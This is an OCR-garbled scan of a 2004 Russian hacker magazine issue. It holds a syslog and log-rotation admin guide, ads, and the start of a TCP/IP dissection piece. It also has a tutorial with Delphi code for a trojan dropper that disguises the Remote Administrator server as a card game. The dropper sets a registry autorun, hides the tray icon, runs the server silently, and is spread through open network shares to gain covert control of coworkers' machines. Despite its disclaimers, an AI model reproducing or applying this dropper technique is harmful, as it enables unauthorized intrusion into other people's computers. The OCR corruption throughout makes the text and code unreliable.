нарастающей (здесь "выше" - значит, 
меньше информации). Например, запись 
сіаетоп . поіісе ; кегп . етегд /ѵаг/Іод/тез- 
задез определяет запись в /ѵаг/Іод/тез- 
задез всех сообщений уровня поіісе и вы- 
ше от всех демонов, а также критичные со- 
общения ядра (и выше - но выше уже ни- 
чего нет). Если же для какого-нибудь де- 
мона надо протоколировать только собы- 
тия определенного уровня, перед уровнем 
ставят "=": таіІ.=беЬид. Кроме того, нес- 
колько подсистем можно перечислить че- 
рез запятую, сопоставив им один уровень: 
таіі.пеѵѵз.сгіі. Также в шаблонах можно ис- 
пользовать значок имеющий тут свое 
обычное для регулярных выражений значе- 
ние - "все". *.* /ѵаг/Іод/аІІ.Іод - указывает 
писать ВСЕ, что происходит с системой в 
/ѵаг/Іод/аІІ.Іод. Спецсимвол "!", предназна- 
ченный для инвертирования: таіі. І=с1еЬид 
означает все, кроме дебага. 

И последнее. Если строка "правило - 
действие" предваряется названием програм- 
мы, то эта строка относится только к упомя- 
нутой программе. Это очень удобно, когда 
нужно "выцепить” логи определенной прог- 
раммы (не обязательно демона) в отдельный 
поток для обработки (писать в отдельный 
файл). При этом имя программы должно на- 
чинаться с например, среди диалапщи- 
ков популярна следующая конфигурация (все 
сообщения ррр писать в отдельный лог- 
файл): 

!ррр 

*.* /ѵаг/Іод/ррр.Іод 
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Смотрим в логи 



л ЖУРНППИРОВПНИЕ 
В ПРИМЕРОК 

Приведу несколько примеров, подтверждаю- 
щих, что на самом деле все очень просто: 



КОНФИГ 5Ѵ5Ю00 



# все критичные для работы системы сообщения, а также 
ВСЕ сообщения ядра выводить на /беѵ/сопвоіе. Это, как пра- 
вило, первая физическая консоль (Леѵ/йуѵО у меня в 
ЕтееВЭВ) 

*.етт:кетп.бебнд:таіІ.стіІ /беѵ/сопвоіе 

# кроме этого, все то, что выше по приоритету, также запи- 
сывать в теззадез 

*.поІісе;кегп.беІ)і]д;таіІ.сгіІ /ѵаг/Іод/теззадез 

# все сообщения подсистемы безопасности писать в отдель- 
ный файл 

зесіітііу* /ѵаг/Іод/зесигііу 

# все что касается аутентификации - писать в аій.Іод 

аиШп(о:ац№ртіѵ.іп(о /ѵат/Іод/аий.Іод 

# все сообщения почты соответствующих уровней - в таіі- 
Іод 

таіі.іпіо /ѵаг/Іод/таіІІод 

й я хочу следить за работой стоп - поэтому все его сообще- 
ния пишутся отдельно 
стоп.* /ѵаг/Іод/сгоп 

й все критичные сообщения писать всюду куда возможно :), 
чтобы они не остались незамеченными 
’.еліетд * 

й все сообщения централизованно складываются на сервер 
протоколирования 



*.* йодіюзі.іоха.іап 

й все сообщения моих любимых программ я хочу видеть в 
отдельных файлах. 

ІрораЗб 

*.* /ѵаг/Іод/рораЗб.Іод 



Ізсапіодб 



/ѵаг/Іод/зсапІодб.Іод 




Для того чтобы демон зузіодсі заново пе- 
речитал свой конфиг, перезагружаться сов- 
сем не обязательно, достаточно послать ему 
сигнал НАІчІСіІІР: 

Для Шлих и РгееВЗО: 

Й кіІІаІІ -Н11Р зузіодй 

Для N61850, ОрепВЗР и Зоіатіз: 

й ркіІІ -НІІР зузіодсі 



л Часто в конфиг 
добавляют новый 
файл, забыв его 
при этом создать 
(Іоисіі 

/ѵаг/Іод/ЯІе.Іод) 
или забыв переза- 
пустить зузіодсі. 



В общем случае: 

# кіІІ -НІІР '$е(І ч /ѵаг/шп/$у5Іод(1.рі(Г 

А БОРЕМСЯ С ПОЖИРПТЕПЯМИ 

диско 

Грамотно настроить зузіодсі - это еще полде- 
ла. Файлы, в которые постоянно дописывает- 
ся информация, имеют свойство разрастаться 
до неприличных размеров, и если не уделять 
этому должного внимания, в один прекрас- 
ный день раздел /ѵаг отвалится, взвизгнув, 
что занято 120% объема :). В Упих, где деле- 
ние на партиции не так популярно, и часто 
можно встретить один большой корневой 
раздел на всю 1з (моветон, не делай так ни- 
когда), этот момент можно отсрочить (и на- 



Порой только долгое ковыряние в /ѵаг/Іод 
помогает выяснить, нто за клоун всю ноль 
долбился на все 65535 портов сервера. 
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л Иногда создан- 
ный лог-файл за- 
бывают прописать 
в пеѵѵзузіодсі/іодго- 
Іаіе, в результате 
чего он остается 
необработанным и 
разрастается. Рано 
или поздно раздел 
файловой системы 
переполнится, и 
зузіодсі больше не 
сможет делать жур- 
нальные записи. 



долго), зато когда он настанет - настанет и 
конец всей файловой системе. К сожалению, 
сам зузіодсі никаких обработок файлов не 
производит, поэтому я расскажу про два са- 
мых популярных подхода управления жур- 
нальными файлами: ВЗО’шный и линуксовый. 

А ВОЗЬМИТЕ У НОС В РОТПЦИЮ 

Самый удобный способ ротации логов - ис- 
пользование пеѵѵзузіод. Запускаемый по 
крону один раз в час/сутки/месяц, он прос- 
матривает логи, ищет те, что попали под 
его правила, и создает новые чистые фай- 
лы журнала, инкрементно архивируя ста- 
рые под именем ІодТіІе.?, где ? - цифра, и 
опционально сжимая их для экономии мес- 
та. Файл конфигурации по умолчанию - 
/еіс/пеѵѵзузіод.сопі, состоит из следующих 
основных полей: 

О имя лога - полный путь до файла жур- 
нала, за которым нужно следить; 

О владедец: группа и права доступа - 
атрибуты создаваемого архива; 

О счетчик - глубина инкрементного 
архивирования; 

О размер - максимальный размер файла; 

О срок - время срабатывания правила. 

Размер либо срок могут иметь значение 
- это значит, что решение об архивиро- 
вании принимается на основе одного из двух 
аргументов. Рассмотрим на примере: 

/ѵаг/Іод/ррр.Іод гооЬеІѵюгк 640 3 100 * I 

Эта строчка говорит о том, что следить 
нужно за логом ррр.Іод, созданному архиву 
присваивать права 640, причем владельцем 
выставить рута, а группой - пеіѵѵогк, эту опе- 
рацию проводить максимум три раза, реше- 
ние об архивировании проводить на основе 
размера файла - он не должен превышать 
100 Кб, всегда, плюс ко всему сжимать ар- 
хив (ключ 2) утилитой Ьгір2 (сотрезз/діір в 
зависимости от системы). 

ІМеѵѵзузІод, регулярно стартуя по расписа- 
нию, будет смотреть, не превысил ли ррр.Іод 
размер в 100 Кб, и если превысил - переи- 
меновывать старый лог в ррр.Іод. 0, создавая 
новый пустой ррр.Іод; сожмет ррр.Іод.О в 
ррр.Іод.0.іи2 и присвоит архиву права 640, 
владельца - гооі, группу - пеіѵѵогк. Когда раз- 
мер уже нового ррр.Іод снова превысит 100 
Кб, программа переименует уже существую- 
щий ррр.Іод. О.Ьі2 в ррр.Іод. 1 .Ьі2 и создаст 




ППЫЕРНПТИВЫ 8Ѵ8Ю60 

8 узіод-пд позволяет обрабатывать логи с использованием ре- 
гулярных выражений (хорош для фильтрации отдельных со- 
общений, форматирования журнала протокола и т.п.), а также 
умеет передавать логи на удаленный хост по ТСР. 

Зоскіод работает совместно с сіаетопіооіз и дтаіі. Создан для 
тех, кто уже заменил ЫпсІ и зепсітаіі на Ііпусіпз и дтаіі и хочет 
найти адекватную замену и для зузіодсі. 

Мзузіод предлагает модульную архитектуру для облегчения на- 
писания к сислогу всяких фишек, в том числе сохранения логов в 
базе данных, фильтрации на основе регулярных выражений и т.д. 

МіпігзузІодсІ - маленький и безопасный демон исключительно 
для принятия логов с удаленных хостов по сети. 



I №и$у$Іод ■ очень удобное и гибкое 

средство, и тап пеѵѵзузіод расскажет тебе 
, еще много интересного. 



новый ррр.Іод. О.Ьі2 по тому же алгоритму. 

14 так далее, пока самый старый из архивов ло- 
га не станет называться ррр.1од.З.Ьг2 (мы же 
указали счетчик - 3). После чего он удаляется, 
а третьим становится второй и т.д. Резонный 
вопрос: как часто нужно запускать пеѵѵзузіод из 
стоп? На незагруженной машине это можно де- 
лать раз в два-три дня, на среднем сервере - 
раз в день, на загруженной станции - пойдет и 
раз в час. ІѴеѵвузІод - очень удобное и гибкое 
средство, и тап пеѵѵзузіод расскажет тебе еще 
много интересного. 

А РЕШЕНИЕ ОТ ТЖ0ДРПЙВЕР0В 

ІМеѵѵзузІод штатно идет в поставке 
Ргее/ОрепВЗЭ, тогда как Іюдгоіаіе присут- 
ствует в большинстве дистрибутивов І_іпих. 
Занимается он тем же и с подобной же пе- 
риодичностью запускается по крону. Отли- 
чие, как водится, в конфигурации. Здесь 
главный конфиг /еіс/іодгоіаіе.сопі выглядит 
примерно следующим образом: 

йаііу 
гоіаіе 1 
сгеаіе 
сотргезз 

іпсішіе /еіс/іодгоіаіе.сі 

Это означает - заниматься обработкой ло- 
гов каждый день, перелопачивать новые ло- 
ги один раз перед удалением старых (глуби- 
на инкрементного архивирования), создавать 
новый пустой лог-файл с тем же именем, 
сжимать созданные архивы. Лаконично, 
правда? Последняя директива основная - 
указывает смотреть все дополнительные 
конфиги, расположенные в каталоге 
/еіс/іодгоіаіе.сі. В них-то мы и указываем 
специфические для каждого демона пара- 
метры. Например, создадим файл /еіс/Іодго- 
Іаіе.б/Ирсі: 

/ѵаг/Іод/№р(1/ассез5.Іод { 
ѵѵеекіу 
гоіаіе 5 



сошргезз 

поіііетріу 

тіззіпдок 

} 

/ѵаг/Іод/ШрсІ/еггог.Іод { 
ѵѵеекіу 
гоіаіе 5 
сотргезз 
поіііетріу 
тіззіпдок 

} 

Здесь мы указали параметры ротации 
логов апача. Синтаксис секции: путь до 
лог-файла, и в фигурных скобках - пара- 
метры его обработки. В один конфиг (у нас 
- ІШрсі) можно занести сколь угодно много 
таких секций. Удобно создать несколько 
конфигов, в каждом из которых описать 
правила ротации логов одного конкретного 
демона (зциісі, затба, арасбе). В нашем 
случае параметры обработки каждого фай- 
ла следующие: заниматься обработкой 
еженедельно (несмотря на то, что Іодгоіаіе 
запускается раз в день), утилизировать но- 
вый лог пять раз и только потом удалять 
старые, сжимать полученные архивы, ниче- 
го не делать с логом, если он и так пустой, 
и, наконец, не впадать в панику, если ука- 
занный лог не найден. 

^ журнальный СЕРВПЧ0К 

Напоследок - парочка советов по управле- 
нию логами в серьезных сетях. Так как ин- 
формация о событиях очень важна при рас- 
следовании инцидентов, а первое, что дела- 
ют хаксоры на взломанной тачке - это трут 
логи, то я настоятельно рекомендую завести 
отдельный Іод-сервер, где кроме зузіодсі ни- 
чего не будет крутиться (старенький компь- 
ютер подойдет), и все логи со всех машин 
централизованно отправлять на него, ведь 
ты теперь знаешь, как это сделать. Только в 
этом случае ты будешь знать всю правду о 
событиях в сети. ^ 



ПО 






Магнитное экранирование 
Деревянный корпус 

Пульт дистанционного управления в комплекте 



^ІЬаІапсе 

\л/\л/\л/.]'е1:ЬаІапсе 



г и 



Дистрибуторы: 

игагсі ( 095 ) 780 . 3266 ; Деникин ( 095 ) 787 . 4999 ; ЕІ.5ІЕ ( 095 ) 777 . 9779 ; СІІІІіпк ( 095 ) 744.0333 



I 





И видно, когда меркантильный коппега «у другана на работе» спивает из инета через 2-мегабитный шланг очередную часть 
«Властелина колец», прячет в утробе своего винта и не дает скопировать фильм через покапку. 0 может быть, требует за это 
материальное вознаграждение. Что делать? Выход один - негласное удаленное администрирование его тачки :). 




ПДМИНИМ ПОПЬЗОВПТЕПЕЙ В СВОЕЙ СЕТИ 




С уществует такая прога, как 

Ветоіе Асітіпізігаіог. Ты навер- 
няка про нее знаешь - это па- 
кет из двух программ для уда- 
ленного администрирования 
компов, работающих по техно- 
логии «Клиент-сервер», и пре- 
доставляющий почти полную 
власть над удаленной тачкой. Например, 
можно посмотреть, что у удаленного юзера 
творится на экране, нажимать мышкой на 
ярлыки, запускать проги и т.д. А если раск- 
рыть окно с изображением чужого десктопа 
на весь экран (батон Р12), то вообще созда- 
ется впечатление, что работаешь, сидя за 
чужим компом. Можно также вырубить или 
ребутнуть удаленный комп, а главное - есть 
доступ к любым файлам на винте (их можно 
копировать, удалять, переименовывать, соз- 
давать папки). 

Однажды у моего знакомого на работе 
пошла такая мода: каждый юзверь расшари- 
вал определенную папку на полный доступ 
для обмена файлами с другими юзверями, 
т.е. сотрудники теперь могли просто кидать- 
ся друг в друга доками и варезом. Это все- 
общее разгильдяйство способствовало рож- 
дению идеи подсовывать коллегам трояна, 
чтобы полазить по их винтам в поисках того 



самого... в смысле, недозволенного и нерас- 
шаренного. 

А ВЗГЛЯД ИЗНУТРИ 

Наверное, ты знаешь, что большинство вин- 
довых прог содержат в своем коде всевоз- 
можные ресурсы, такие как иконки, курсоры, 
битмапы. Иногда в них содержатся еще и 
диалоговые окна (их описалово), звуки, ви- 
део. Самое интересное, что таким образом 
ты можешь прикомпилить к проге все что 




душе угодно, а потом юзать эти данные в 
Вип-Тіте. В умах хакеров сразу возникает 
мысль: а почему бы не прилинковать к проге 
троян и, когда юзверь запустит прогу, вти- 
хую выкладывать его к юзверю на винт? Но 
надо еще замаскировать сам троян и его по- 
явление вообще. Каким образом? Отвлечь 
юзера! Внушить ему, что он запустил нор- 
мальную прогу, как это делают вири, зара- 
жающие ехе-файлы. 

Результатом изысканий стала следующая 
прога. Кехе-файлу были прилинкованы: 

О. Сам файл для удаленного админист- 
рирования г зегѵег.ехе, переименованный 
для большей скрытности в гипбІІ32.ехе и 
придавленный АЗРаск’ом (пакер ехе, сІІІ и 
осх-файлов) для уменьшения размера. 

О. Две сІІІ-библиотеки и файл русифика- 
тора, которые шли вместе с системой уда- 
ленного администрирования (проверять ее 
работоспособность без этих файлов было в 
лом, так что до сих пор и не знаю, нужны 
они или нет). 

О. Игра «Переводной дурак 2000» для 
отвлечения юзера: 4 картинки, ехе’шник 
Ригак.ехе (символично, да? ;)) и іпі-файл 
настроек. 
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ППРОПЬ «РЫБП-КОНЬ> 



іа 

л 


ПРЕППРИРУЕМ ІР 

Учимся посылать на 
удаленный хост кучу 
пакетов с левым ІР 
отправителя. Вливайся! 




Ю0РНП СЛУЖБЕ КПТ0П0Г0В 

Идеальное решение для базы, 
которую много читают и мало 1 
модифицируют. Изучаем ЭТО і 
на примере адресной книги. 


*,тГ ’ Ѵг 


ЗЯМУТИ свой 
ѴПН00&ѴПШ0ЕХ 

Найти нужное файло 
на локальном РТР - задача 
не для слабонервных. 
Организуем свой поисковик! 


> 





# А5РасК2.11 



-о 

• \ ^ ’А~і\ г* 



- 




Ѵ/ш32 ЕХЕ ОН упаковщик 

Владелец: 

ІІИПЕе»$ТЕЯЕО 

3»гі«ѵ* 



Версия 2.11 

Файл Упаковка Настройка 0 программе Помощь 
Прогресс упаковки 



СТОП ! 



40 X 

Изменение размера Файла 



а 



Уменьшаем размер 



А ИДЕЯ 

Алгоритм будущей проги нарисовался сам 
собой и был прост как веник. Вот он: 

О. Вытащить из себя и сохранить во вре- 
менную директорию файлы игры, проверяя, 
есть ли они уже там. 

О. Если игра уже загружена (опреде- 
лить по заголовку окна), активизировать 
уже запущенную игру (вытащить на перед- 
ний план), а если не загружена - запус- 
тить ее. 

©. Пока юзверь играется :), выгрузить 
из себя в системную директорию файлы 
сервера, проверяя, есть ли они там. 

О. Внести изменения в реестр (автозаг- 
руз сервера и его невидимость в трее). 

Ѳ. Запустить сервер, если он еще не за- 
пущен. 

©. Выгрузиться. 

А ШЕВЕЛИМ МОЗГПМИ 

ипппьцпии 

Чтобы прикомпилить что-то к своей проге, 
сначала нужно преобразовать это «что-то» в 
файл ресурсов тез, для чего в пакет Реірбі 
включен специальный компайлер ресурсов 
Ьгсс32.ехе. Для получения двух гез-файлов 
(отдельно сервер и игра в дурака), можно 
написать вот такой Ьаі-файлик: 

Несііо оп 



дате.гс 

ЙІІКАШЕ КСРАТА 0ШК.ЕХЕ 
ОІМ ІМ «СВАТА ВІШАШІ 
ВРІСК5ВМР КСРАТА ВКІСК5.ВМР 
ТАШЕВМР «СВАТА ТАВЕЕ.ВМР 
ТАВЕЕ2 ВМР «СВАТА ТАВЕЕ2.ВМР 
ТАШЕЗВМР КСРАТА ТАВЕЕЗ.ВМР 

Когзе.гс 

АВМВИ.Ви. «СВАТА АВМВЦ.ВЕЕ 
КАОВКѴ.ВИ КСРАТА КАВВКѴ.РИ 
ѴІ5ЕВІІ.ВИ КСРАТА ѴІВЕВНОИ 
КІІВРИЗг ЕХЕ «СВАТА КЦЧРЕЕЗг.ЕХЕ 
104Ш «СВАТА 10491МЕ 

Итак, после отработки компайлера ресур- 
сов у злого программиста получится 2 файла 
ресурсов: дате.гез (415 Кб) и Ітагзе.гез (356 
Кб). Самое время загрузить беірбі, т.к. сей- 
час начнется самое главное ;). 

А КОДИНГ 

Первое, что необходимо сделать - это уда- 
лить форму из проекта, сохранить проект 
под именем Ригак.сірг и открыть его на ре- 
дактирование (Ргоіесі/Ѵіеѵѵ Зоигсе). После 
этого грохается все лишнее. Должно остать- 
ся только это: 



Р*:Фг:' і Аыіогц 




... 


Ѵігщі*Мв 

кт*, і».- ||Ы> 


Р**ИП 

ІЛ*Р 


1* 






№Ы4т 




ІПп.* 


1“ 












Ги^ІЬЧи 






Вставляем иконку 



компилятору: ($П Іюгзе.гез) и ($П дате.гез). 
Обработав эти директивы, он включит файлы 
ресурсов в код проги. А извлекать эти самые 
ресурсы и класть их на винт пользователям в 
виде файлов будет функция ЕхІгасІВезоигсе 
(ее листинг - на врезке). 

Теперь надо организовать парочку функ- 
ций, командующих функцией ЕхІгасІВезоигсе, 
передавая ей в качестве параметров имя ре- 
сурса, который надо извлечь, и имя файла, в 
который его залить. Имена файлов и ресур- 
сов берутся из .гс-файликов и вставляются в 
код проги в виде константных двумерных 
массивов. Посмотри листинг этих функций 
на врезке, код откомментирован и не должен 
вызывать никаких проблем. 

Итак, продолжаем разговор (с) Карлсон. 
После слива сервера на винт жертве, надо 
еще поставить его в автозагруз и скрыть 
иконку в трее. Для этого мы немного подп- 
равим реестр жертвы, оформив это в виде 
процедуры СбапдеПедізігу(сопзі 
огзеРІІеІЧате: зігіпд). Ее кодты напишешь 
сам (или подсмотришь в исходнике :)), а я 
лишь намекну, что для этого надо заюзать 
объект ТПедізІгу или ТВедІпіРІІе. Параметры 
в реестр нужно прописать такие: 

- Автозагруз. Ключ: 

НКСи\5оЙдааге\МісгозоЙ\ѴѴІпсІоѵѵз\Сиггеп1Ѵег 
зіоп\Вип, строковый параметр: гипбН32, зна- 
чение: с:\ѵѵіпгіоѵѵз\гипс1ІІ32.ехе /зіагі 

- Скрытие из трея. Ключ: 

ЕЧ КДМ \ЗѴ5ТЕМ \ВАсІ т і п\ѵ2 . 0\3егѵег\ РагатеЕег 
з, двоичный (!) параметр: РізаЫеТ гауісоп , 
значение: 01 00 00 00. 

Теперь кинь зоркий взгляд на врезку со 
скромным названием «Код нашей проги», 
потому что как раз этот код и реализует за- 
ложенное в написанных нами функциях. На- 
деюсь, он не вызовет никаких сложностей ;). 



<Е0- 

а На Сй лежит со- 
рец под все винды. 

В нем юзаются 
функции из пакета 
йеірііі ѴѴогкз, ска- 
чать который ты 
можешь с 
ѵѵѵѵѵѵ.іоггу.пеі. Там 
же ты найдешь 
тонны халявных и 
не очень компо- 
нентов для Эеірііі и 
С++ Виіісіег. 




Если не хватило 
денег на журнал с 
дисками, беги на: 
а ѵѵѵѵѵѵ. хакер. ги - 
там тоже лежит 
исходник 
а ѵѵѵѵѵѵ .іашаіесіі. 
сот/сіоѵѵпіоасі/гасі- 
тіп2 1 . 2 ір - сливай 
ЯАбтіп отсюда 



"<путь>\Ьгсс32.ехе" "<путь>\дате.гс" "<путь>\дате.ге$” 
"<путь>\Ьгсс32.ехе” "<путь>\Ног5е.гс" "<путь>\Ііог$е.ге$" 
раизе 

Тут пути могут быть прописаны как пол- 
ностью, так и относительно. Также можно 
обойтись и без путей, свалив все добро в 
одну папку. 

Файлы дате.гс и Ьогзе.гс желательно за- 
ранее подготовить в «Блокноте»: 



ргодгат йигак; 

{$К *.ге$} 

Ьедіп 

еші. 

Создается секция изез, и туда прописыва- 
ются модули ѴѴіпбоѵѵз, СІаззез, ЗузІЛіІз, 
ЗИеІІАРІ и Редізігу. Они пригодятся. Теперь 
подрубаются уже готовые файлы ресурсов. 
Перед Ьедіп набиваются еще две директивы 



А ИМЕЙ В ВИДУ 

Что же еще должен сделать настоящий 
Штирлиц, чтобы юзер ничего не заподоз- 
рил? А надо ему сделать так, чтобы иконка 
твоего будущего ехе-файла была идентична 
иконке настоящей игры «Переводной дурак 
2000». Для ее извлечения можно воспользо- 
ваться каким-нибудь граббером ресурсов, 
например Везоигсе Наскег, или просто бато- 
ном по имени РгіпІЗсгееп и утилитой Ітаде 
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кодинг 






А Не используй это 
на практике! Прос- 
то знай, как тебя 
могут поиметь, и с 
осторожностью от- 
носись к ехе-фай- 
лам от братьев по 
сетке ;). 



Есіііог из пакета РеІрЫ. После извлечения 
ісо-файла пропиши его в Ргоіесі/Орііопз. Те- 
перь можно собирать проект. 

И вот еще что хочу сказать. Если ты вдруг 
решился применить эту информацию на 
практике, в результате получится рабочая 
прога-инсталлер. Но знай, что это только 
для ѴѴІпХР/2003/Ш. На прочих маздаях ее 
пускать не советую, т.к. пути прописаны 
вручную и все такое прочее, поэтому конф- 
ликты с настоящей гипсІІІ32.ехе и кривыми 
путями гарантированы. Будь поосторожней. 
Например, чтобы не затереть настоящую 
виндовую прогу гипсІІІ32.ехе, требуется сде- 
лать следующее: 

О. В ѴѴІп9х/МЕ г зегѵег.ехе переименовать 
в ЯІІШІІ-Зг.ЕХЕ. Писать его в зуз1ет32. 

О. В ѴѴІп N1 /2000/ХР/2003/Ш г_зегѵег.ехе 
переименовать в гипсІІІ32.ехе. Писать его в 
директорию ѴѴІппі или Мпгіоѵѵз. 

А ПРИШПОРЬ КОНЯ! 

Итак, после компиляции получится файл 
Оигак.ехе, размер которого после примене- 
ния к нему все того же АЗРаск’а составит 635 





ЛИСТИНГ ГІШСТІОЫ 
ЕХТВПСТНЕ80ІЖСЕ 

Іііпсііоп ЕхІгасІКе$оигсе(соп$1 РезНаше, РІІеИате: зігіпд): 

Вооіеап; 

ѵаг 

Вігеат: ТРезоигсеЗігеат: II Поток для сохранения ресурса в 
файл. 

Ьедіп 

КеснІЬ Тгие: 

і( РІІеЕхізІз(РІІеПаліе) II Если файл с таким именем уже есть 
- выходим. 

Ібеп Ехіі; 
ігу 

II Создаем поток и извлекаем в него ресурс. 

$1геапі:= ТВезоіігсеЯгеат.СгеаІеІНІпеІапсе, РезИате, 
РТ_РСРАТА); 

Ігу 

$Ігеат.$аѵеТоЕІІе(ЕІІе№те); II Сохраняем ресурс в файл, 
(іпаііу 

РгееАпйПіІ(51геат): 

елгі: 

ехсері II В случае ошибки 
ВезнІЬЕаІзе; II возвращаем Раізе 
епб; 
епб; 

ЛИСТИНГ 

ЕМТНПСТСПИЕГИЕ8& 

ЕМТНПСТН0Н8ЕГІЕЕ8 

сопзі 

II Файлы/имена ресурсов игры в дурака. 
батеРезоигсез: аггау[0..5, 0..1] оі зігіпд = 
(('ОиВАК.ЕХЕ'.'йигак.ехе'), 

<зкірреб> 

СТАВЕЕЗ_ВМР | , | 1аЫеЗ.Ьтр 1 )): 

II Файлы/имена ресурсов сервера. 

НогзеРезоигсез: аггау[0..4, 0..1] о( зігіпд = 
(ГАВШДЕ'.'абтбУП 1 ), 

<зкірреб> 

( , Ш49_ЕП6 , І І 1049.Ілд')): 

{ Параметр ЭІГ - папка, куда сохранять извлеченные ресурсы} 
Іипсііоп Ех4гас10атеРІІез(сопз4 біг: зігіпд): Вооіеап: 

ѵаг 

і: Іпіедег: 
беділ 

РезиІІ:= Раізе: 

(ог і:=0 Іо 5 бо 

К поі ЕхІгасІРезоигсе(6аліеВезоигсез[і, 0], біг + 
СаліеВезоіігсезр, Щ 
(Пен Ехіі: 

РезиІІ:=Тгие: 

епб: 

Іипсііоп ЕхІгасІНогзеЕіІезІсопзІ Оіг: зігіпд): Вооіеап: 
ѵаг 

і: Іпіедег: 
беділ 

РезиІІ:= Раізе: 

Рог і:=0 Іо 4 бо 

К поі ЕхІгасІРезоигсе(НогзеРезоигсез[1, 0], йіг + 
НогзеРезоигсезІі, 1]) 

Ібеп Ехіі: 

РезиІІ:=Тгие: 

епб: 

V 



Кб. Это вполне приемлемо для маленькой 
оконной игрушки и не вызывает подозрений. 

Теперь любой злодей может подготовить 
и нетал лер к распространению - создать 
в закромах своего винта папку, например, 




КОД НПШЕЙ ПРОГИ 

Ьедіп 

ІІ поі ЕхІгас16аліеРІІе5('с:\ѵііпбоиі$\ІептрѴ) Ібеп НаІІ(О): 

II Функция баліеІзВнплеб не описана, т.к. журнал не 
резиновый 

II Смотри исходник на диске или качай из инета. 

ІІ поі СапіеІзКиппеб 
Ібеп ІІ ЗЬеІІЕхесиІе(0, 'ореп 1 , 
РСбаг( І с:\ѵ™бо»5\Іепф\Вигак.ехе'), піі, 
піі, ОДМогтаІ) <= 32 Ібеп НаІІ(О); 

і( поі ЕхІгасІНогзеРІІезСсЛиіпбоѵѵзѴ) II см. выше. 

Шел НаІІ(О): II На выход при ошибке 

СЬапдеКедізІгуСсЛиіпбоѵѵзѴипбІІзг.ехе 1 ): II См. исходник 
ЗбеіІЕхесііІеІО, 'ореп 1 , РСбаг('с:\мпбо»з\гііпбІІ32.ехе'), 
піі, піі, ЗѴѴ_Нібе): 
епб. 

«Переводной дурак 2000», положить в нее 
только что полученную прогу Оигак.ехе и 
остальные 5 файлов, которые шли вместе 
с оригиналом игры. 

После этого надо найти в сети шары, отк- 
рытые на запись. Для этого вышеозначенный 
злодей наверняка воспользуется утилитой 
№ІѴІеѵѵ, запустив в ней сканер шар (№1ѵѵогк 
ЗЬаге Зсаппег), который составит ему список 
открытых ресурсов юзеров. Затем он заки- 
нет созданную папку с файлами в каждую 
шару и будет ждать. 

Но как же он узнает, активизировал ли 
кто-нибудь его систему удаленного админи- 
стрирования? А воспользуется он той же 
утилитой ІМеіѴіеѵѵ. Этим сканером портов 
он проверит включенные компы в сети на 
открытый порт 4899 (по умолчанию, это порт 
Петоіе Асітіпізігаіог’а). Если этот порт на 
удаленной тачке открыт, значит, юзер «поиг- 
рался в дурачка» :), и злобный хакер может 
смело делать с его компом разные недозво- 
ленные вещи при помощи клиентской проги 
Петоіе Асітіпізігаіог Ѵіеѵѵег. 

А ИМЕЙ СОВЕСТЬ 

Настоятельно НЕ рекомендую использовать 
эту прогу во вред бедным юзверям. Одно 
дело знать, как это реализуется, другое де- 
ло - обижать пользователей. Именно поэто- 
му исходник, который мы положили на диск, 
слегка дефектный. Он абсолютно полный, 
но в нем намеренно допущены ошибки, что- 
бы лишить ламеров возможности безбашен- 
но его компилировать и пускать в бой. 
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ЛОБРО ПОЖАЛОВАТЬ В ИНТЕРНЕТ 1 




Модемы серии ОММ 56К 
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КПКЕР/№03(63)/2004 







В ывшие юные натуралисты поинят, что для того, чтобы лучше понять, как функционирует лягушка, крыса, синица или ящерица, нужно 
прибегнуть к препарированию. То есть вскрыть, разобрать на части и посмотреть, как работает каждая из них. Вот четырехкамерное 
сердце, желудок, пищевод. Вооружившись микроскопом, можно рассмотреть структуру тканей. Подкрутив увеличение, можно увидеть 
и клетки - кирпичики, из которых состоит живой организм жителя леса, поля или болота. Вернее, состоял. 



РПБ0ТПСШГ80СКЕТ8ВиШ 




л Исходники при- 
веденных прог- 
рамм возьмешь на 
СО. Пример ис- 
пользования РОО 
для ѴѴіп95 можно 
найти по приве- 
денному в статье 
адресу. 



И нтернет - то же болото. Лягуш- 
ки ТСР/ІР соединений, ІЮР-го- 
ловастики, жуки РІМС’ов и ли- 
чинки ОМ5-запросов шныряют 
тут и там, повинуясь подвод- 
ному течению роутингов. Наша 
задача сегодня - выловить 
несколько экземпляров этой 
живности и препарировать их. Разложить на 
косточки, кишочки и прочий ливер. А потом 
из всего этого мы вполне сможем собрать 
какого-нибудь Франкенштейна. 

А ТСР/ІР 

Пожалуй, самым сложным из всех стандартных 
ІР-протоколов является ТСР, в котором клиент 
и сервер для осуществления коммуникации 
открывают по отдельному сокету для каждого 
соединения. На ТСР ездят большинство интер- 
нет-сервисов, хорошо знакомых каждому: 

НТТР, РОРЗ, 5МТР, ТЕШЕТ, 53Н и т.п. 

На первый взгляд (или спьяну) может по- 
казаться, что ТСР соединение - своего рода 
выделенный канал, работающий по принци- 
пу: с одного конца вбросил - с другого пой- 
мал. Однако, протерев похмельные глаза ру- 
кавом, замечаешь массу небольших пакетов, 
с помощью которых этот поток реализуется. 
Грубо говоря, двунаправленный поток дан- 
ных по ТСР из ІР-пакетов склеивается воеди- 
но. Протокол предусматривает несколько 
важных моментов, делающих сокет-соедине- 
ния тем, что они собой и представляют. Во- 
первых, в ІР никто не гарантирует доставку 
пакетов, в то время как потеря куска данных 



в сокет-соединении недопустима. Поэтому 
на каждый принятый пакет получающая сто- 
рона отвечает подтверждением. В против- 
ном случае все посылается заново. Кроме 
этого, ТСР-пакеты имеют порядковые номе- 
ра, используемые для восстановления по- 
рядка, в котором были посланы данные. 
Контрольные суммы, включенные в пакеты, 
обеспечивают сохранность данных и их при- 
бытие на место назначения в лучшем виде. 

Формат пакетов ТСР, а также их разно- 
видности ты запросто найдешь в РРС. Аб- 
бревиатура ТСР означает ТгапзроП СопігоІ 
РгоіосоІ, и сам протокол часто обозначается 
как ТСР/ІР, так как уровнем ниже лежит ІР - 
Іпіегпеі РгоіосоІ. 

А ЧЕРНЫЙ РМС СМЕРТИ 

Общеизвестно, что старый добрый пинг ис- 
пользуется для проверки соединения с ма- 
шинкой, имеющей определенный адрес. На 
самом деле протокол этот называется ІСМР, 
а пинг - одно из его применений с включен- 
ной есію-функцией. Получая такой пакет, 
хост обязан ответить точной копией получен- 
ных данных. 

втгм 



Как ни странно, когда-то злобные хакеры 
валили хосты именно с помощью пинга. Дело 
в том, что некоторые операционки были уяз- 
вимы для атак типа Ріпд о? сіеа№. Их смысл 
прост: машинке с дырявой операционкой по- 
сылался пинг длиной больше стандартных 
65535 байтов. Системы, вроде Зоіагіз 2.4, 
Міпіх, МасОЗ 7, ѴѴІпсІоѵ/з 3.1 1 и 95, от этого 
пучило, они падали, перезагружались и вис- 
